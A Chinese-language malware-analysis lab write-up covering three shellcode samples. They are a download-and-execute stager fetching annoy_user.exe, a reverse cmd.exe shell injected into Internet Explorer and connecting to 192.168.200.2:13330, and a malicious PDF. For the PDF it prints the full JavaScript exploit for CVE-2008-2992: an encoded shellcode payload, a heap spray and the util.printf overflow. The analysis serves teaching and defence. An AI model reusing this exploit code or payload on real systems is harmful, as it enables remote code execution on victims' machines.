恶意代码分析实战 16 Shellcode分析

16.1 Lab19-01

将程序载入IDA。

一堆ecx自增的操作。到200是正常的代码段。

shellcode的解码器也是从这里开始的，一开始的xor用于清空ecx，之后将18dh赋给cx，jmp来到loc_21f,而在下图可以看到loc_21调用sub_208,在call指令执行后，就会把下一条指令的地址也就是224压到栈顶。
如下所示。

可见这里是一个循环，循环体外的202处看到ecx被赋值18dh，循环体中的21B处有dec ecx，这说明ecx是起到计数器的作用，将光标定位到sub_208,按空格键切换模式。

切换回来，208处pop指令会将栈顶也就是224这个地址赋给esi，之后push则是将其压栈，mov指令将esi赋给edi，lodsb指令在这里是将esi赋给eax，esi中的地址是224，该地址的值是多少呢？我们光标定位到224，按d键。

可以看到该地址的值是49h，也就是将49h赋给eax，之后al赋给dl，dl此时的值就是49h，dl减去41h，所得结果左移4位，然后esi自增，变成了225，同样定位225，按d键，结果如下。

问题

1. 这段shellcode是如何编码的？

这个shellcode使用了一种字母编码的方式，攻击负载的一个字节存储在两个编码字节的低4比特位。

2. 这段shellcode手动导入了哪个函数？

shellcode导入了：
LoadL ibraryA
GetSystemDirectoryA
WinExec
URLDownloadToFileA
从上图可以看到shellcode会连接到http://www.practicalmalwareanalysis. com/shellcode/annoy_user. exe

3. 这段shellcode和哪个网络主机通信？

http://www.practicalmalwareanalysis.com/shellcode/annoy_user.exe。
使用URLDownloadToFile将annoy_user.exe下载后保存为了system32目录下的1.exe文件，之后会通过winexec来运行。

4. 这段shellcode在文件系统上留下了什么迹象

shellcode 在文件系统上写了文件%SystemRoot%\System32\I.exe，并运行它。

5. 这段shellcode做了什么？

shellcode 会从指定的URL下载文件，将下载的文件写到硬盘，并运行它。

16.2 Lab19-02

把样本拖入VT内分析：

可以看到爆红，查看一下细节, 发现了IE浏览器进程被创建了。

查看一下导入函数，发现导入了提权相关API。

还有远线程注入以及进程创建相关的API ==========>当然，通过PEID或者depends工具都是可以看到该exe导入的函数！

现在把程序拖入IDA中，一上来就获取了debug权限，后来就获取了IE的路径。

其打开了注册表的HKEY_LOCAL_MACHINE\http\shell\open\command项, 即IE的路径，这个命令行执行后会打开IE浏览器。

接着就以隐藏方式开启了IE浏览器，接着把shellcode注入到IE浏览器内部。


这里是创建远线程进行注入的代码:。

shellcode的首地址以参数形式传递给了函数。

获取shellcode的首地址:

接下来我们直接用Ollydbg来调试shellcode, 将EIP指针指向该shellcode的首地址。

0xE7是秘钥, 利用这个来解密代码。

注意这段代码, 它的首地址是0x407048。

问题

1. 这段shellcode被注入到什么进程中？

这个程序进程注入默认浏览器Internet Explorer中。

2. 这段shellcode位于哪里？

shellcode的缓存区位于0x407030位置。

3. 这段shellcode是如何被编码的？

shellcode与字节0x7e异或。

4. 这段shellcode手动导入了哪个函数

shellcode导入以下函数：

• LoadLibraryA
• CreateProcessA
• TerminateProcess
• GetCurrentProcess
• WSAStarup
• WSASocketA
• connect

5. 这段shellcode和什么网络主机进行通信？

shellcode在TCP端口13330上连接IP地址192.168.200.2

6. 这段shellcode做了什么？

这个shellcode提供了一个远程shell（cmd.exe）。

16.3 Lab19-03

问题

1. 这个PDF中使用了什么漏洞

使用PDFStreamDumper软件打开Lab19-03.pdf，点击Exploits_Scan。

得到如下内容：

Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 9

Note other exploits may be hidden with javascript obsfuscation
It is also possible these functions are being used in a non-exploit way.

PDF文件中包含一个CVE-2008-2992漏洞利用的例子：与Adobe Reader的util.printf的JavaScript实现相关的缓冲区溢出函数。

2. 这段shellcode是如何编码的？

点击此处。

此处包含了一个打开PDF将被运行的JavaScript脚本。

var payload = unescape("%ue589%uec81%u017c%u0000%u6ee8%u0001%u8e00%u0e4e%u72ec%ub3fe%u8316%ub5b9%ue678%u8f17%u337b%u8aca%u4f5b%uc703%ua5bf%u0017%uad7c%u7d9b%uacdf%uda08%u1676%ufa65%u1f10%u0a79%ufbe8%ufd97%uec0f%u0397%uf60c%ub922%u5e7c%ue1bb%u021b%u00c6%u6f00%u0010%u0000%u00a0%u6f00%u00b0%u4e00%u0014%u5600%u8b57%u2474%u310c%ufcff%uc031%u38ac%u74e0%uc10a%u0dcf%uc701%uefe9%uffff%u89ff%u5ff8%uc25e%u0004%u8b60%u246c%u8b24%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u2ae3%u8b49%u8b34%uee01%ue856%uffbb%uffff%u443b%u2824%uec75%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%ue9e8%u0002%u0000%uc031%u4489%u1c24%uc261%u0008%u3156%u64c0%u408b%u8530%u78c0%u8b0f%u0c40%u708b%uad1c%u408b%ue908%u0005%u0000%ufbe9%uffff%u5eff%u55c3%ue589%uec83%u6008%u758b%u890c%u8bf7%u1455%u4d8b%uac10%ud030%uc2fe%ue2aa%u6af8%u6a00%u6a02%u6a04%u6a00%u6803%u0000%u4000%u458b%u5018%u5d8b%uff08%u1853%u4589%ufffc%u1075%u75ff%u500c%u73ff%ue828%u000d%u0000%u75ff%ufffc%u2c53%u8961%u5dec%u14c2%u5500%ue589%uc031%u5050%u8d60%ufc75%u7d8d%u8bf8%u1055%u5503%u8bfc%u1445%u452b%u68fc%u0000%u0000%u5057%uff52%u0c75%u55ff%u8508%u74c0%u8b0b%u0107%u8b06%u3b16%u1455%ud772%u8961%u5dec%u10c2%u5e00%u7589%u89ec%u89f7%ue8f3%uff42%uffff%u4589%ub9fc%u000e%u0000%u50ad%u75ff%ue8fc%ufee4%uffff%ue2ab%u68f3%u336c%u0032%u7368%u6568%u896c%u50e0%u13ff%uad91%u5150%uc9e8%ufffe%uabff%uf631%u5d8b%u81ec%u04c6%u0000%u8d00%uf845%u5650%u53ff%u3b1c%u3c43%ued75%u7589%u31f8%uffd2%u4473%uff52%u3053%uc085%u840f%u0131%u0000%u4589%u31f4%u52d2%uff52%u4073%u75ff%ufff8%u2053%u73ff%uff44%uf475%u75ff%ufff8%u2473%u3ae8%uffff%u31ff%u8dc0%udcbd%ufffe%ub9ff%u0040%u0000%uabf3%ubd8d%ufedc%uffff%u6857%u0100%u0000%u53ff%u3110%u8dc0%udcbd%ufffe%uf2ff%u4fae%u7d89%uc7e4%u6607%u6f6f%uc72e%u0447%u7865%u0065%u5d8b%u8dec%udc85%ufffe%u50ff%u4a68%u0000%uff00%u4473%u75ff%u53f4%u94e8%ufffe%u31ff%u8dc0%u88bd%ufffe%ub9ff%u0015%u0000%uabf3%u958d%ufe88%uffff%u8d52%u9895%ufffe%u52ff%u5050%u6850%uffff%uffff%u5050%u8d50%udc85%ufffe%u50ff%u53ff%uff04%uf475%u53ff%u3134%u8bd2%uec5d%u73ff%u524c%u53ff%u8530%u74c0%u8974%uf045%ud231%u5252%u73ff%uff48%uf875%u53ff%uff20%u4c73%u75ff%ufff0%uf875%u73ff%ue824%ufe7d%uffff%u458b%uc7e4%u6200%u7261%uc72e%u0440%u6470%u0066%u858d%ufedc%uffff%u6a50%u8b4a%uec5d%u73ff%uff4c%uf075%ue853%ufe03%uffff%uc931%u858d%ufe98%uffff%u00c7%u706f%u6e65%u40c6%u0004%u0568%u0000%u5100%u8d51%udc85%ufffe%u50ff%u858d%ufe98%uffff%u5150%u53ff%uff38%u0c53%u0068%u0000%u5000%u53ff%u9008%u9090");
var version = app.viewerVersion;
app.alert("Running PDF JavaScript!");
if (version >= 8 && version < 9) {
    
    
    var payload;
    nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
    heapblock = nop + payload;
    bigblock = unescape("%u0A0A%u0A0A");
    headersize = 20;
    spray = headersize+heapblock.length;
    while (bigblock.length<spray) {
    
    
        bigblock+=bigblock;
    }
    fillblock = bigblock.substring(0, spray);
    block = bigblock.substring(0, bigblock.length-spray);
    while(block.length+spray < 0x40000) {
    
    
        block = block+block+fillblock;
    }
    mem = new Array();
    for (i=0;i<1400;i++) {
    
    
        mem[i] = block + heapblock;
    }
    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
    util.printf("%45000f",num);
} else {
    
    
    app.alert("Unknown PDF version!");
}

unescape函数和一个长的文本字符串和初始化攻击负载。unescape按下列方法翻译每个%字符串。

• 如果%后跟一个u，则它取出后面4个字符，将它们作为一个ASCII的十六进制，并且将它转化为2个字节。由于大小端的原因，输出次序将会被交换。
• 如果%后没有跟一个u，则取出后面2个字符，将它们作为一个ASCII的十六进制，并且将其翻译至一个字节。

例如，以%ue589%uec81%u017c开头的字符串将被转化为十六进制的序列，0x89 0xe5 0x81 0xec 0x7c 0x01。

3. 这段shellcode手动导入了哪个函数？

scdbg -f Lab19-03_sc.bin -fopen Lab19-03.pdf -i

这个shellcode手动导入如下函数：

4. 这段shellcode在文件系统上留下了什么迹象？

看一下scdbg的结果，可以发现，shellcode在文件系统上创建文件%TEMP%\foo.exe与%TEMP%\bar.pdf。

5. 这段shellcode做了什么？

使用IDA打开Lab19-03_sc.bin文件，在此处点击c转换成代码。

shellcode开头使用call/pop技术获取一个全局数据的指针。


0x183是Lab19-01中描述的findKernel32Base，0x195是findSymbolByHash函数。
shellcode循环遍历符号哈希数组，解析它们并将它们存回来创建一个函数指针数组。在①处，它对kernel做了14次操作。然后，在②处，shellcode向栈中压入两个DWORD值来创建字符串shell32，并将其作为LoadLibraryA的参数。只有一个来自shell32.dll的导出项被解析，冰杯加入导函数指针数组中。
shellcode从PDF中提取其中存储的两个编码文件，并且将它们写入%TEMP%目录。同时，它运行foo.exe文件，并用默认的处理器打开bar.pdf文件。